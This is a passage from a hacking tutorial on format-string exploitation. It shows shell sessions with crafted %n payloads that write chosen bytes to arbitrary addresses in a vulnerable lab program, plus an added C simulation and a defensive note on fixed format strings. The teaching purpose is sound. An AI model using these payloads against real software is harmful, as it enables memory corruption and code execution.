The wrong way to print user-controlled input:
??bffff3d0b7fe75fc 0
[*] test_val @ 0x08049794 = 420 0x000001a4
reader@hacking:~/booksrc $
By manipulating the field-width option of one of the format parameters before the %n, a certain number of blank spaces can be inserted, resulting in the output having some blank lines. These lines, in turn, can be used to control the number of bytes written before the %n format parameter. This approach will work for small numbers, but it won't work for larger ones, like memory addresses.

Looking at the hexadecimal representation of the test_val value, it's apparent that the least significant byte can be controlled fairly well. (Remember that on this little-endian machine the least significant byte is actually located in the first byte of the four-byte word of memory.) This detail can be used to write an entire address. If four writes are done at sequential memory addresses, the least significant byte of each write lands on a different byte of a four-byte word, as shown here:
Memory                      94 95 96 97 98 99 9A
First write to 0x08049794   AA 00 00 00
Second write to 0x08049795     BB 00 00 00
Third write to 0x08049796         CC 00 00 00
Fourth write to 0x08049797           DD 00 00 00
Result                      AA BB CC DD 00 00 00
As an example, let's try to write the address 0xDDCCBBAA into the test variable. In memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC, and finally 0xDD. Four separate writes to the memory addresses 0x08049794, 0x08049795, 0x08049796, and 0x08049797 should accomplish this. The first write will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc, and finally 0x000000dd.

The first write should be easy.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??%x%x%8x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc 0
[*] test_val @ 0x08049794 = 28 0x0000001c
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xaa - 28 + 8
$1 = 150
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n
The right way to print user-controlled input:
??%x%x%150x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc 0
[*] test_val @ 0x08049794 = 170 0x000000aa
reader@hacking:~/booksrc $
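The following C program is an added example, not code from the book or from fmt_vuln. It reproduces the numbers in the session above without any vulnerable printf call: a literal format string with %n applied to a local int shows that "%x%x%8x" leaves a count of 28 and "%x%x%150x" a count of 170 (0xaa), the field-width arithmetic done in gdb (0xaa - 28 + 8 = 150) is written out as a function, and the four overlapping 4-byte stores from the table are simulated in a local 7-byte array. The "AAAA" prefix and the two stack words 0xbffff3d0 and 0xb7fe75fc are constructed stand-ins for what fmt_vuln printed; the program touches no memory outside its own variables.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Constructed stand-ins for the page's output: four address bytes placed in
   front of the format (here "AAAA" instead of "\x94\x97\x04\x08") and the two
   stack words that the first two %x conversions consumed. */
static const char ADDR_PREFIX[] = "AAAA";
static const unsigned STACK_WORD_1 = 0xbffff3d0u; /* prints as 8 hex digits */
static const unsigned STACK_WORD_2 = 0xb7fe75fcu; /* prints as 8 hex digits */

/* What %n sees after "%x%x%<width>x": the number of characters emitted so far.
   The format is a string literal and %n targets a local int, which is the
   only legitimate use of %n; the width is passed at run time through '*'. */
int bytes_counted_before_n(int width)
{
    char scratch[512];
    int counted = -1;
    snprintf(scratch, sizeof scratch, "%s%x%x%*x%n",
             ADDR_PREFIX, STACK_WORD_1, STACK_WORD_2, width, 0u, &counted);
    return counted;
}

/* The arithmetic the page does in gdb: if the last field currently has
   current_width and %n counted counted_now, this width makes the count end
   at target_byte (the page's example: 0xaa - 28 + 8 = 150). */
int width_for_target(int counted_now, int current_width, int target_byte)
{
    return target_byte - counted_now + current_width;
}

/* Simulate the table: four little-endian 4-byte stores of 0x000000XX at
   consecutive offsets. The low byte of each store lands on its own offset and
   the three zero bytes spill over the following ones, which is why the
   stores must be done in ascending order. */
void sequential_byte_writes(uint8_t mem[7])
{
    const uint32_t values[4] = { 0x000000aa, 0x000000bb, 0x000000cc, 0x000000dd };
    memset(mem, 0, 7);
    for (int i = 0; i < 4; i++) {
        uint32_t v = values[i];
        uint8_t le[4] = { (uint8_t)(v & 0xff), (uint8_t)((v >> 8) & 0xff),
                          (uint8_t)((v >> 16) & 0xff), (uint8_t)((v >> 24) & 0xff) };
        memcpy(mem + i, le, 4); /* unaligned 4-byte store at base + i */
    }
}

/* Pack all seven simulated bytes little-endian so one value describes the
   whole result: 0x00000000ddccbbaa means AA BB CC DD 00 00 00 in memory. */
uint64_t simulated_bytes_packed(void)
{
    uint8_t mem[7];
    uint64_t packed = 0;
    sequential_byte_writes(mem);
    for (int i = 6; i >= 0; i--)
        packed = (packed << 8) | mem[i];
    return packed;
}

int main(void)
{
    int after8 = bytes_counted_before_n(8);
    int width = width_for_target(after8, 8, 0xaa);
    int after150 = bytes_counted_before_n(width);
    printf("%%x%%x%%8x   -> %%n counts %d\n", after8);
    printf("width needed for 0xaa: %d\n", width);
    printf("%%x%%x%%%dx -> %%n counts %d (0x%08x)\n", width, after150, after150);
    printf("simulated memory as a packed value: 0x%016llx\n",
           (unsigned long long)simulated_bytes_packed());
    return 0;
}
```

The defensive point is visible in the first function: the only difference between this program and fmt_vuln is that the format string here is a compile-time literal, so the caller, not the user, decides where %n writes; printing user data through a fixed "%s" format removes the bug entirely, and gcc's -Wformat-security flags the non-literal printf(user) pattern at build time.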